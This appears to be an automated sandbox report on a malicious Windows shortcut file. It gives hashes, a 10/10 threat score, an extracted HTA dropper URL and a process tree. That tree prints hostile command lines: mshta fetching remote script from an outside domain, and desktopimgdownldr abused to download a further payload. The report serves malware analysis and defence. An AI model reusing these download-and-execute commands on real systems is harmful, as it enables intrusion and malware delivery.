Overview

overview

10

Static

static

1

f35bc7fcf7...78.lnk

windows7-x64

10

f35bc7fcf7...78.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 04:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk

  • Size

    1KB

  • MD5

    95bfcc2eac48c76681aa2d97a5674201

  • SHA1

    f72d50b2bba6e479ec106ae2f6fe993ab6eef99a

  • SHA256

    f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478

  • SHA512

    952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://0day.works/a

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://0day.works/a
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr
        3⤵
          PID:2332

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads